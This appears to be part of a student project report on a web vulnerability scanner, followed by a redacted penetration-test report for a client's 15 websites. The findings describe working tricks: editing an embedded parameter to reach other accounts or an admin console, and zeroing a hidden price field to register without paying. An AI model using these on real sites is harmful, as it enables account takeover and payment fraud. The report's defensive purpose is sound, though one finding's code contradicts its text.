The authenticated pages that are gathered as a result of subcrawling are then further tested for vulnerabilities and reported to the user.

This phase involves only one class:1. Subcrawler

5.5.1 Subcrawler

This class is similar to basic crawling where each authenticated link is taken their href parameter is removed and stored. Since this has already been explained in an earlier section its implementation will not be shown here.

It must be noted that these pages are a case of Failure to Restrict URL Access as specified by OWASP. This is because without any login credentials it is possible to generate a HTTP Request and retrieve the information in these pages.

Also the subcrawler checks for Directory Listing of Files. This can be checked by taking the page source and checking for <address>…</address> tags. If such tags are present then the user is intimated the page where directory listing has been found.

Source Code for checking Directory Listing of Files

<page> = <html source code of given URL>

if(<page>.indexOf("<address")!=-1) “Directory Listing found in URL ” + <url>


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6.1 RUNNING OUR TOOL ON WEB APPLICATIONFor the purpose of testing we designed our own Web Application with known defects/vulnerabilities and deployed in a separate machine. In another machine we implemented and ran our tool. Using our tool we accessed the Web Application and tested it for vulnerabilities. The results of this testing have been documented in this section.

6.1.1 Screenshots of vulnerable Web Application Home Page

Fig 12.Vulnerable Application Home Page

This is the home page of our designed Web Application. Here users are required to input a valid log in to proceed to the authenticated pages. If login is unsuccessful then user is returned back to this login page. If login is successful then user is redirected to authenticated page. If wrong details are entered ie data that is written specifically to trigger exceptions they are caught properly and the browser is automatically redirected to the login page.


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Authenticated Page (after user log in is successful)

Fig 13.Vulnerable Application Authenticated PageThis is an authenticated page that the user sees after he/she has supplied proper login credentials.

6.1.2 Phase 1 and Phase 2The Vulnerable Web Application is hosted in the IP Address under port number 15023 and the name of the Web Application in sqlvulnerableapp_3_1_2.

This is given as input to the text box and when search is clicked Phase 1 as specified in implementation begins. The results of Phase 1 are displayed as header information in the right textbox and issues relating to it are displayed in the textbox below that. Since our domain name is not officially registered the IP Address and Location are displayed as unknown. The crawling phase then begins which is Phase 2. All the links associated with the Web Application get listed in the bottom left text box along with the number of pages found. If all links have been traversed by crawler then the label at the bottom left becomes Scan Complete.


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Furthermore if any of the pages traversed by crawler contains a <form> tag then the Open Form Console button becomes enabled. It must be noted that till then the button remains disabled.

Fi Fig 14.Our Tool- scanning page


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Fig 15.Our tool-proxy pane

The above screenshot is used to set the proxy for the tool. The first text box is used to set the Proxy Address and the second text box is used to set the Proxy Port.

Fig 16.Our Tool-Form Console

6.1.3 Phase 3This is a screenshot of the Form Console. The Form Console contains the list of all forms found within the Web Application and stored by our tool. In our Web Application there exists only one form which is at the home page. Labels are used to list the URL of the form, its name, method and action respectively.

A textarea to the right specifies all the parameters associated within the form; their Type and Name. To the right of that is a textarea containing the entire HTML source code of the page. Below the form associated labels is a textarea listing the vulnerabilities in the current page with respect to the currently displayed form. Also provision has been made to modify the parameters of the form. This can be done by clicking on the modify params button which enables the parameter, type and Set value labels and the textbox so that user can set its parameters. After setting all required parameters user can click submit and the attack phase will begin.


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Fig 17.Our Tool-Form Console Parameter Modification

6.1.4 Phase 4The attack phase begins soon after the user clicks on submit. Attack vectors are automatically created by the tool and are used to attack the target Web Application on the target page. Since the form, its method and action are all already known to the tool and parameter set by the user it is very easy for the tool to commence attack and report the results.

After each attack vector is deployed (they are deployed sequentially) if they are successful then a messagebox is displayed to the user stating the success of the Attack Vector in compromising the Web Application and intimates the user to make appropriate changes for the same.

Fig 18.Our Fig 18: Tool-Response Message(SQL Injection)


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Fig 19.Our Tool-Response Message(XSS)

Fig20.Our Tool Response Message(SSL)


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6.1.5 Phase 5Phase 5 involves the subcrawling phase of the tool where the authenticated page URLs are displayed on the topmost listbox. The HTML source code associated to it is displayed on the right. Also two more text boxes detail about the issues found in these pages and on which page each issue is found can be discerned by clicking on each listing.

Fig 21.Our Tool SubCrawler Phase


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6.2 RESULTSFor contrasting we compare the results that have been generated by our own tool for our web application with other popular commercially used automated testing tools. The tools which we have taken into consideration for this audit are WebSecurify and Netsparker.

For brevity the results of this test have been documented as a table.Vulnerability Our Tool Websecurify NetsparkerInjection Yes No NoXSS Yes No YesCSRF Yes No NoSecurity Misconfiguration

Yes No No

Failure to Restrict URL Access

Yes No No

Unvalidated Redirects and Forwards

Yes No No

Insufficient Transport Layer Protection

Yes No Yes

Auto – Complete Check

Yes Yes Yes

Server Disclosure Yes Yes NoBack End Disclosure

Yes Yes Yes

Set – Cookie HTTPOnly

Yes Yes Yes

Fig 22.Our Tool Results For Vulnerable Application


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Through this project we have been able to learn about the most fundamental and prevalent Web Application vulnerabilities that exist on the Internet. As part of this project we have installed and tested existing penetration testing tools and reverse engineered the mechanisms by which they identify vulnerabilities. This knowledge was vital in the creation of our own tool.

We have created a semi - automated Black Box penetration testing tool that can identify most vulnerabilities in a given Web Application. We have tested our tool on a vulnerable Web Application created by ourselves and also on an existing Web Application on the Internet. These findings have been reported and documented in this Project Report.

The next logical step with regards to the future work of this project would be the implementation of those vulnerabilities which have been mentioned as out of scope from the current project. These have been specifically documented in the ‘What we will not implement’ column under the Scope table. Also some network security elements such as port scanning and Packet Analysis can be integrated into the functionality of the tool to make it even more comprehensive and effective.


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1. Bau Jason, Bursztein Elie, Gupta Divij, Mitchell John (2010). State of the Art: Automated Black-Box Web Application Vulnerability Testing Security and Privacy (SP), 2010 IEEE Symposium on Date: May 2010

2. Gupta P, Johari K, Linagay's Univ., India (2009) Implementation of Web Crawler Emerging Trends in Engineering and Technology (ICETET), 2009 2nd International Conference on Date: Dec. 2009

3. Fonseca J, Vieira M., Madeira H., CISUC, Univ. of Coimbra, Coimbra, Portugal (2009)Vulnerability & attack injection for web applications, Dependable Systems & Networks, 2009. DSN '09. IEEE/IFIP International Conference on Date: July 2009

4. http://www.OWASP.org 5. General reference from http://www.Wikipedia.org6. SecTools.Org: Top 125 Network Security Tools from

http://sectools.org/web-scanners.html7. Kumar (2011 July 5) 10 Free and Open source Tools for Security

Testing from http://www.toolsjournal.com/testing-lists/item/217-10-free-and-opensource-tools-for-security-testing

8. Russ McRee (2011 March 21) OWASP Top 10 Tools and Tactics http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics

9. http://en.wikipedia.org/wiki/Application_security, 27 Feb 2012


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As part of our project we conducted Web Application Security Testing for an organization which is a group of 15 sites. This section contains the official report which we sent to them after our assessment of their web sites. To protect the confidentiality of the Client Organization all sensitive information about them have been either omitted/hidden.


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THE CLIENT ORGANISATION (inclusive of its entire links)Security Assessment Report

April 5, 2012

Report Prepared by:Ram G Athreya, S.Raghavendar,

Students of B.Tech [email protected], [email protected],

Guided by: U.ThiruvaazhiAsst Professor

[email protected]

Department of Information TechnologySSN College of Engineering

Old Mahabalipuram Road, Kalavakkam, India, Pincode 603110

The information contained within this report is considered proprietary and confidential to the client organisation.Inappropriate and unauthorized disclosure of this report or portions of it could result in significant damage or loss to the client organisation. This report should be distributed to individuals on a Need-to-Know basis only. Paper copies should be locked up when not in use.


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EXECUTIVE SUMMARY.....................................................................................55

Issues/Defects/Vulnerabilities Identified 551. Information Security Policy...................................................................................................................552. Authorization using embedded object’s parameter................................................................................563. Crucial information stored in hidden form fields...................................................................................594. Form Login uses GET Method..............................................................................................................605. XSS (Cross Site Scripting).....................................................................................................................616. Password Transmitted over HTTP.........................................................................................................627. Failure to Restrict URL Access.............................................................................................................638. Insecure Direct Object Reference..........................................................................................................649. Cookie not marked HTTP Only.............................................................................................................6510. Security Misconfiguration....................................................................................................................6511. Listing of Files/Directories..................................................................................................................6612. No Server Side Validation...................................................................................................................6613. Forbidden Resource.............................................................................................................................6714. Internal Server Error............................................................................................................................6715. Auto Complete not Disabled................................................................................................................6816. CVV code not made a Password Field.................................................................................................6817. Resource no longer available...............................................................................................................69

Scope 70In Scope......................................................................................................................................................70Out of Scope...............................................................................................................................................70

Testing Methodology 71

ASSET IDENTIFICATION...................................................................................73

Assets of the Client Organisation 73

THREAT ASSESSMENT....................................................................................77

Threats to the Client organisation 77

LAWS, REGULATIONS AND POLICY...............................................................79

Indian Law and Regulation – IT Act(2000) 80

What the IT Act(2000) means to the Client Organisation 82


Management 83


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Operations 83

Development 83

Vulnerabilities 84There is no information security officer.....................................................................................................84Create an information security team..........................................................................................................84

NETWORK SECURITY.......................................................................................85

Network Security Best Practices 85Control.......................................................................................................................................................85Implementation guidance...........................................................................................................................85Other information.......................................................................................................................................86Organizational guidelines..........................................................................................................................86

SYSTEM SECURITY..........................................................................................87

Vulnerabilities 87Apache 2.2.3..............................................................................................................................................87Zend Server 4.0..........................................................................................................................................88Microsoft IIS 6.0........................................................................................................................................88Perl 5.8.8....................................................................................................................................................88PHP 5.3.6...................................................................................................................................................88

APPLICATION SECURITY.................................................................................89

OWASP TOP 10 89Injection.....................................................................................................................................................89Cross Site Scripting (XSS).........................................................................................................................91Broken Authentication and Session Management.....................................................................................92Insecure Direct Object Reference..............................................................................................................93Cross Site Request Forgery (CSRF)..........................................................................................................94Security Misconfiguration..........................................................................................................................95Insecure Cryptographic Storage.................................................................................................................96Failure to Restrict URL Access.................................................................................................................97Insufficient Transport Layer Protection.....................................................................................................98Unvalidated Redirects and Forwards.......................................................................................................100

OPERATIONAL SECURITY.............................................................................101

Operational Security Best Practices 101Control.....................................................................................................................................................101Implementation guidance.........................................................................................................................102Other information.....................................................................................................................................105

PHYSICAL SECURITY.....................................................................................105

Physical Security Best Practices 106Control.....................................................................................................................................................106Implementation guidance.........................................................................................................................106Other information.....................................................................................................................................108


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Client Organisation details

Executive Summary

Most of the issues/defects/vulnerabilities detected in the client organisation and detailed in this report are of minimal risk or hard to exploit or oversights in the part of the developer which due to minimal functionality provided in the sites may never be compromised. However, we also found some glaring threats which can be easily exploited by an experienced attacker, especially one dealing with payment; these have been highlighted in this report. A best practices manual has been supplemented with this report to correct these issues/defects/vulnerabilities and also serve as a guide when the developer needs to develop more sites for the organization.

Issues/Defects/Vulnerabilities Identified

This part of the report deals with all the issues/defects/vulnerabilities identified across all sites which come under client organisation. Each of the vulnerability found is reported only once here with detailed explanation and screenshot.The list below contains the Issues/Defects/Vulnerabilities discovered during the site security assessment. Some of the issues listed here are coalesced from more than one section of the assessment report findings. It is recommended that these be evaluated and addressed as soon as possible. These should be considered significant and may impact the operations of the Client organisation.

1. Information Security PolicyAn information security policy is the primary guide for the implementation of all security measures. There is no formal policy specific to the Client organisation. Recommendation:

1. Develop an information security policy that specifically addresses the needs of the Client organisation and its mission. Use that policy as a basis for an effective security program.


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2. Review your information security policy periodically with changing requirements.

3. Also have an officer, who is accountable, to constantly monitor progress and to check if adopted/implemented developmental practices adhere to the security policy.

2. Authorization using embedded object’s parameterIn one of the Client organisation’s site, users are required to supply their login credentials upon which they are directed to the another page where their individual accounts with credit balances are shown and the users with enough credits can watch videos. Credit diminishes per view of each video. This mechanism is implemented by accepting login credentials from the user and authenticating it by the server, after which a parameter is returned.The authenticated page contains a flash object which is embedded in it and the parameter which is returned by the server upon authentication is set as params under flashvars in the page’s embed tag and also as the parameter for the RenderPostLogin() function. In case of invalid user the RenderPostLogin() function contains no arguments and the params contains the value “undefined”. In the case of a valid login both contain a number. By this method dynamic content is generated for each user.Screenshot


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HTML Source Code<body scroll="no" onload="RenderPostLogin(5662)" bgcolor="#661003">..<embed type="application/x-shockwave-flash" src="postlogin.swf" width="100%" height="100%" style="undefined" id="postlogin" name="postlogin" quality="high" wmode="transparent" allowfullscreen="true" allowscriptaccess="sameDomain" flashvars="params=5662">…..</body>

Now the problem lies with the fact that the parameters for both the RenderPostLogin() function and for the flash object’s params can be set at the client side for example if it is set 5661 then another user’s data will be displayed in the browser. This exploit can be achieved without possession of any login information whatsoever and an attacker can potentially access any user account.Incidentally, we found out that setting the params to 1 the admin console is opened using which an attacker can take over the entire system.Screenshot


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This exploit is not easy to execute but if executed its severity will be extremely high as seen in the above screenshots and hence must be fixed swiftly.

Recommendation: To fix the above issue the best and easiest thing to do is to hide the flashvars parameter in the embed tag so that it is not shown to the user. Also hide the RenderPostLogin() function if possible.If this method is not feasible then scrap the current procedure and implement a different procedure in its place that does not compromise the security of the system by displaying key authentication information to the user.The long term solution is to have a better session authentication mechanism.


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3. Crucial information stored in hidden form fieldsOne of the Client Organisation’s site has some pages where users can register for upcoming events and make payments for the same. All such registrations are under a page where a user can select a desired event and then register for it and make payment via a PayPal API which acts as a payment gateway between Client and the user.Upon successfully registering and making payment the registration is confirmed and a mail is sent to that effect. The user can then check his/her mail and a link are provided within the mail where they can check their transaction details.


The event registration for the page shown above is $35.00 and this information is stored in a hidden field which can easily be manipulated by the user.HTML Source Code<p class="event_prices"><span class="event_price_label">Price:</span> <span class="event_price_value">$35.00</span><input type="hidden" name="price_id" id="price_id-226" value="226"></p>

The value parameter in this particular Hidden Field when modified to 0 produces the following result as shown in the next screenshot


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As can be seen the value of the registration fee has changed from $35.00 to $0.00. Further when the complete

registration button is clicked the registration is confirmed and the necessary mail gets sent without having to pay any money.

Recommendation: The solution to this issue is similar to the previous one that is do not display key information to the end user especially in a way he/she can easily modify it. Sessions can be used to store the same information that is being stored in the hidden field. Session information cannot be viewed in the browser since it is stored in the server side.

4. Form Login uses GET MethodIn one of the Client organisation’s site the login screen uses GET method in its form tag. This is very unwise since the query string will be displayed in a browser’s URL and if passwords are not encrypted then it will be displayed in the browser’s address bar as plain text and anybody can read it.Screenshot

HTML Source Code<form action="#" style="" method=”post”>…..<input type="text" id="logins-email" name="email" class="logins-input" tabindex="1001" style="font-size: 0.9em; "><br><br>…..


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<input type="password" id="logins-password" name="password" class="logins-input" tabindex="1002" style="font-size: 0.9em; ">…..<button type="submit" class="logins-send submit" tabindex="1006"></button>…..</form>

Recommendation: The solution here is simple: Here the form method is not specified, if not specified the default method is GET. Instead implement POST as mentioned above. Also use <input type=”submit” …> instead of using <button> tag. <button> tag is deprecated in some browsers and <input type=”submit” …> is better practice.

5. XSS (Cross Site Scripting)Cross-site scripting (XSS) is a type of computer insecurity vulnerability typically found in Web applications (such as web browsers through breaches of browser security) that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented.

Recommendation: The primary defense mechanism to stop XSS is contextual output encoding/escaping. There are several different escaping schemes that must be used depending on where the untrusted string needs to be placed within an HTML document including HTML entity encoding, JavaScript escaping, CSS escaping, and URL (or percent) encoding.

Safely validate untrusted HTML input by sanitizing it. Sanitization means content filtering that is to remove the content of unwanted or mobile code that might result in harm to the system. HTML sanitization tools such as OWASP AntiSamy and http://htmlpurifier.org/ accomplish this task.For example consider a blog where such validation or escaping is not done then an attacker can easily inject scripts within his posts which when clicked by a user can be made to retrieve the session and authentication information of the user. The scripts could further be used to mail such information to the attacker which can then be used by him to compromise the user or the system.


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If site does not need any client – side scripts then users have the option to disable any such functionality. This allows users, if they choose, to disable scripting in their browsers before using the application. In this way, even potentially malicious client-side scripts could be inserted unescaped on a page, and users would not be susceptible to XSS attacks.

6. Password Transmitted over HTTPIf on a login screen user submits a form with his username and password, the password is sent in plain text. This is because the login credentials are transmitted over HTTP. Instead they must be transmitted over HTTPS. To achieve this, the server must either implement SSL or TLS.

SSL stands for Secure Socket Layer and TLS stands for transport layer security.

TLS and SSL encrypt the segments of network connections above the Transport Layer, using asymmetric cryptography for key exchange, symmetric encryption for privacy, and message authentication codes for message integrity.

For websites a SSL/TLS certificate can be purchased from a proper certifying authority such as VeriSign or you can create your own certificate for your web site.

Pages implemented using a SSL/TLS certificate have the ‘https’ protocol instead of the standard ‘http’ protocol and the ‘s’ stands for security. Recommendation: Get a certificate for the websites from a proper certifying authority such as Verisign.If this proves difficult then implement your own certificate for your server, implementation of SSL/TLS for each server is provided in their documentation which provides a step-by-step guide to implement SSL/TLS for the websites.

SSL Documentation for your respective server’s can be found in the following linksNginx admin - http://kete.net.nz/documentation/topics/show/167-configure-nginx-to-use-sslApache – http://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.htmlZend Server – http://files.zend.com/help/Zend-Server-Community-Edition/appendix_f_-_loading_the_mod_ssl_odule.htmMicrosoft IIS - http://support.microsoft.com/kb/299875


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7. Failure to Restrict URL AccessIn one of the site certain pages which handle the processing of the event registration can be accessed directly by giving the URL in the address bar



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Recommendation: Such pages must be made inaccessible directly by users by implementing redirect mechanisms to other safer pages. Access to above mentioned pages must only be granted after proper authorization and authentication.

8. Insecure Direct Object ReferenceIn one of the client's site on the page http://www.clientorganisation.com/(path)/checkmegacoupon.phpThe following gets generated on the browser screen.Warning: include_once(../includes/DBConfig.php) [function.include-once]: failed to open stream: No such file or directory in/apps/users/adminieo/public_html/ieo/resources/includes/checkMegaCoupon.php on line 2

Warning: include_once() [function.include]: Failed opening '../includes/DBConfig.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in/apps/users/adminieo/public_html/ieo/resources/includes/checkMegaCoupon.php on line 2

Warning: include_once(../ieoadmin/CommLib.php) [function.include-once]: failed to open stream: No such file or directory in/apps/users/adminieo/public_html/ieo/resources/includes/checkMegaCoupon.php on line 3

Warning: include_once() [function.include]: Failed opening '../ieoadmin/CommLib.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in/apps/users/adminieo/public_html/ieo/resources/includes/checkMegaCoupon.php on line 3Invalid Coupon


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Recommendation: First correct the warnings as shown above in the implementation code in chechmegacoupon.php and ensure such error messages are not thrown at the user. This is because using the above code the hacker can deduce the directory you use to store your files for example we found that http://www.clientorganisation.com/resources/ returns a directory of all files used in your site.

9. Cookie not marked HTTP OnlyIn many of your sites cookies are being used yet they are not being set as HTTP Only.

The HttpOnly attribute directs browsers to use cookies via the HTTP protocol only. An HttpOnly cookie is not accessible via non-HTTP methods, such as calls via JavaScript (e.g., referencing "document.cookie"), and therefore cannot be stolen easily via cross-site scripting.

Recommendation: Set cookie as HTTP Only when you declare/define them.

10. Security MisconfigurationIn your site’s WordPress login screens admin is your default username. This needs to be changed immediately since attackers can easily find out that you have an account with username admin and dictionary/brute force attack is possible on your log in screen.Screenshot


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Recommendation: Change your admin username from admin to anything else that cannot easily be guessed by an attacker. Additionally implement a strong alphanumeric password.

11. Listing of Files/Directories Some web servers will display a list of all files in a directory if that directory doesn't contain an 'index' file. This can compromise the internal file structure and an attacker can inadvertently gain access to restricted files in the server.Screenshot

HTML Source Code<address>Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Server at </address>Recommendation: Make such pages inaccessible from the browser. Also servers such as Apache as shown above have an option to turn off directory listing of files in browser. The page was detected due to the <address> tag that is implemented.

12. No Server Side ValidationIn one of the Client organisation’s site the event registration does not have any server side validation. All validation is handled on the client side instead. It is good practice and mandatory when payment is involved to process the data on the server; rather in this case the payment is first processed in the client and then forwarded to the payment gateway.The payment gateway implemented is a PayPal API written in jQuery and only basic input validation is done in the payment registration page which


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is then forwarded to PayPal via the API and the money is then credited to Client.Recommendation: This issue does not have a simple fix. Rather you must change the entire mechanism by which you handle payments. Have a login facility such that users can only register for events after they register for an account and have logged in. A Session must be created after a user has successfully logged in to handle further event registration requests and all requests must first be processed on the server side before being forwarded to PayPal.Such information must be properly logged for future reference and any sensitive information must not be made available to the end user since he/she can potentially modify it (refer issue 3).

13. Forbidden ResourcePages where resources are forbidden to normal users must not be accessible in the first place. Making such pages accessible via the address bar and displaying that the resource is not forbidden is not good practice.Screenshot

Recommendation: Implement proper access granting and redirect mechanisms on pages that contain sensitive content.

14. Internal Server Error

The Web server (on which the web application is hosted) encountered an unexpected condition/exception that prevented it from fulfilling the request by the client for access to the requested URL.

This is a 'catch-all' error generated by the Web server. Basically something has gone wrong, but the server cannot be more specific about the error condition in its response to the client. In addition to the 500 error notified back to the client, the Web server should generate some kind of internal error log which gives more details of what went wrong.



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Recommendation: Ensure that all exceptions in your application are properly handled at the server side. If not then debug the code and implement appropriate counter measures such as try – catch blocks etc.

15. Auto Complete not DisabledMost browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, credentials entered by the user are stored on the local computer and retrieved by the browser on future visits to the same application.The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

HTML Source Code<form method=”post” autocomplete=”off”>…..</form>Recommendation: To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields – this should be used only when all fields in the form contain sensitive information) or within the relevant INPUT tags (to protect specific individual fields which contain sensitive information). 

16. CVV code not made a Password FieldThe CVV code field in site’s event registration pages where credit card information is required, is not a password field. This is especially risky since in the same page the users are asked for their credit card number and the form is not auto complete disabled.Screenshot


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HTML Source Code<form id="paypal_pro_payment_form" name="paypal_pro_payment_form" method="post" >…..<label for="cvv">CVV Code</label><input type="text" name="cvv" id="ppp_exp_date" class="valid"><input name="amount" type="hidden" value="35.00"><input name="paypal_pro" type="hidden" value="true"><input name="id" type="hidden" value="665">…..</form>

Recommendation: Set auto complete to off in the page and make the CVV field a password field.(so that the typed cvv code is not viewable)

17. Resource no longer available

The 404 or Not Found error message is a HTTP standard response code indicating that the client was able to communicate with the server, but the server could not find what was requested.

The web site hosting server will typically generate "404 - Not Found" web page, when users attempts to follow a broken or dead link, hence the 404 error is one of the most recognizable errors users can find on the web.

A 404 error should not be confused with "server not found" or similar errors, in which a connection to the destination server could not be made at all. A 404 error indicates that the requested resource may be available again in the future; however, the fact does not guarantee the same content.


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Recommendation: If the resource is no longer available then remove all links to the page in the web site.


The current project’s scope is to check mostly for vulnerabilities in the web applications belonging to the Client organisation. In a sense it can be approximated to Black Box Testing in the sense that we only check for vulnerabilities that can be exploited by an end user without any/minimal knowledge of the internal workings of the system/s used by the client.

In ScopeThe following activities are within the scope of this project:

Penetration Testing of all sites under Client organisation. Assessment and identification of technologies used in creating

and managing the sites. Application of standard methods to crack key areas of each site

such as log in screens etc. Use of available penetration testing tools as well as our own

tool to check for generic implementation/technological defects.

Out of ScopeThe following activities are NOT part of this security assessment:

Interviews with key staff members in charge of policy, administration, day-to-day operations, system administration, network management, and facilities management.


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A Visual Walk Through of the facilities with administrative and facilities personnel to assess physical security.

Social Engineering to acquire sensitive information from staff members.

Testing Methodology

As mentioned earlier penetration testing will be carried out for each site under client. For this purpose we have designed our own tool and also use two tools namely Netsparker and Acunetix which are widely used and popular in Web Application Security Testing.Following the testing of these tools certain key pages which act as authentication gateways are manually tested by us to ascertain their level of security.

The flowchart below gives an abstract graphical description of the testing methodology implementing in auditing each site for vulnerabilities.


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Phase 1: Automated Testing Phase

Phase 2: Manual Testing Phase

Consolidated Vulnerability Assessment

Consolidated Vulnerability Assessment

Identification of critical pages/URL

Identification of critical pages/URL

Manual TestingManual Testing

Risk AssessmentRisk Assessment


Target URLTarget URL

Other ToolsOther Tools

Application SpideringApplication Spidering

Black Box TestingBlack Box TestingOur ToolOur Tool

Vulnerability AssessmentVulnerability Assessment

Vulnerability AssessmentVulnerability Assessment

Consolidated Vulnerability Assessment

Consolidated Vulnerability Assessment


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Asset Identification

For asset identification we took each site in isolation and tried to find out its composition that is key information such as IP Address, HTTP Version, Server etc. To achieve this objective we forged custom made HTTP Requests and analyzed the response thus generated for each site and have tabulated the results for clarity.

Assets of the Client OrganisationThe following tables document some of the client assets (1 table per site). It should not be considered a complete and detailed list. The 15 sites given below have been identified as part of the Client and the assets that have been declared are not the only assets that exist, rather they are the ones that have been identified as most vital for conducting this review and for the formation of this report.

#Site1IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin


Not Set

Not HTTP Only



#Site2IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin

Post-Check=0, Pre-Check=0

No Cache

Not HTTP Only



#Site3IP Address

HTTP Version



Cache Control



Back End use

Back End Version


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1.1 text/html

nginx admin

Not Set

Not Set

Not Set

None Used


#Site4IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin

Post-Check=0, Pre-Check=0


Not HTTP Only



#Site5IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin

Not Set

Not Set

Not Set

None Used


#Site6IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin

No-Store, No-Cache, Must-Revalidate

No Cache

Not HTTP Only

None Used


#Site7IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin


Not Set





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#Site8IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin

Not Set

Not Set

Not Set

W3 Total Cache

#Site9IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin

Public, Must-Re Validate, Proxy-Re Validate

Public Not Set



#Site10IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin

Not Set

Not Set

Not Set

W3 Total Cache

#Site11IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

nginx admin

Public, Must-Revalidate, Proxy-Revalidate

Public Not Set

W3 Total Cache


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#Site12IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

Apache 2.2.3 (Cent OS)

Post-Check=0, Pre-Check=0, Must-Re Validate


Not HTTP Only

PHP, Zend Server

5.2.11, 4.0

#Site13IP Address

HTTP Version


Server Cache Control



Back End used

Back End Version


1.1 text/html

Apache2.0.64 (Unix)

Post-Check=0, Pre-Check=0


Not HTTP Only

PHP, Perl

5.3.6, 5.8.8

#Site14IP Address

HTTP Version


Server Cache Control



Back End used

Back End Version


1.1 text/html

Microsoft IIS 6.0



Not HTTP Only


Not Specified

#Site15IP Address

HTTP Version



Cache Control



Back End used

Back End Version


1.1 text/html

Apache 2.0.64 (Unix

Post-Check=0, Pre-Check=0


Not HTTP Only

Not Used



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Threat Assessment

The threats that are taken under consideration are nothing but the issues/vulnerabilities/defects detailed under the executive summary. We have determined the actual threat level for each issue based on two parameters namely Probability of Occurrence and Impact of Threat. Based on these two parameters the threats are tabulated and the result is also expressed in the form of a graph for better understanding.

Threats to the Client organisation

The Threat Probability vs Impact Chart is used to evaluate the threat level of each issue/vulnerability/defect. It is based on the principle that a threat has two primary dimensions:

1. Probability - A threat is an event that "may" occur. The probability of it occurring can range anywhere from just above 0% to just below 100%.

2. Impact - A threat, by its very nature, means a possible compromise to the security of the system, which has undesirable consequences. However, the quantum of the impact varies.

The probability that a threat will occur is represented on X - Axis of the chart - and the impact of the threat, if it occurs, on the Y - Axis.

These two measures are used to plot the threat on the chart. This gives a quick, clear view of the priority that needs to be given to each. Then decisions can be made with respect to resource allocation for each threat.The resulting chart can be reduced or abstracted to 4 unique quadrants as shown below

Low impact/Low probability – Threats in the bottom left corner are low level, and you can often ignore them.

Low impact/High probability - Threats in the top left corner are of moderate importance - if these things happen, they can be managed. However, likelihood of such threats must be reduced.


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High impact/Low probability – Threats in the bottom right corner are of high importance if they do occur, but they're very unlikely to happen. For these, however, contingency plans need to be in place just in case they do.

High impact/High probability – Threats towards the top right corner are of critical importance. These are your top priorities, and are risks that must be paid close attention to.

Threat Impact Probability of Occurrence

Threat Level

Low Low Low Low High Medium High Low Medium High High HighThe following table details the threat levels of each issue as identified in the executive summary:S.No Issue/Defect/Vulnerability Threat

ImpactProbability of Occurrence

Threat Level

1 XSS (Cross Site Scripting) High High High2 Crucial information stored

in hidden form fieldsHigh High High

3 Form login uses GET Method

High High High

4 Authorization using embedded object’s parameter

High Low Medium

5 Password Transmitted over HTTP

High Low Medium

6 Failure to Restrict URL Access

High Low Medium

7 Insecure Direct Object Reference

High Low Medium

8 Cookie not marked HTTP Only

High Low Medium

9 Security Misconfiguration High Low Medium10 Listing of Files/Directories High Low Medium11 No Server Side Validation High Low Medium12 Forbidden Resource Low High Medium13 Internal Server Error Low High Medium14 Auto Complete not Disabled Low Low Low15 CVV code not made a Low Low Low


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Password Field16 Resource no longer

availableLow Low Low

Threat Probability vs Impact Chart


- Must be addressed immediately - Not immediate but must be addressed

- Optional

Laws, Regulations and Policy

Impact of Threat

Probability of Occurrence








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This section has been included to inform the reader of this report on relevant IT Security Laws as enacted by the Government of India and which may be applicable for your organization. (Laws stated here are only applicable and enforceable in the Union of India).Internet crime is crime committed on the Internet, using the Internet and by means of the Internet.With the evolution of the Internet, came another revolution of crime where the perpetrators commit acts of crime and wrongdoing on the World Wide Web. Some crimes committed on the Internet have been exposed to the world and some remain a mystery up until they are perpetrated against someone or some company.The different types of Internet crime vary in their design and how easily they are able to be committed. There are crimes that are only committed while being on the Internet and are created exclusively because of the World Wide Web. The typical crimes in criminal history are now being brought to a whole different level of innovation and ingenuity. Such new crimes devoted to the Internet are email “phishing”, hijacking domain names and cyber vandalism. The question about how to police these crimes has already been constructed, but this task is turning out to be an uphill battle. Since the first computer crime law, the Counterfeit Access Device and Computer Fraud and Abuse Act of 1984, the government has been trying to track down and stop online criminals. The reality is that Internet criminals are rarely caught. One reason is that hackers will use one computer in one country to hack another computer in another country. Another eluding technique used is the changing of the emails, which are involved in virus attacks and “phishing” emails so that a pattern cannot be recognized. An individual can do their best to protect themselves simply by being cautious and careful.

Indian Law and Regulation – IT Act(2000)

In May 2000, both the houses of the Indian Parliament passed the Information Technology Bill. The Bill received the assent of the President in August 2000 and came to be known as the Information Technology Act, 2000. Cyber laws are contained in the IT Act, 2000.The Information Technology Act, 2000 aims to provide for the legal framework so that legal sanctity is accorded to all electronic records and other activities carried out by electronic means. Some highlights of the Act are listed below:


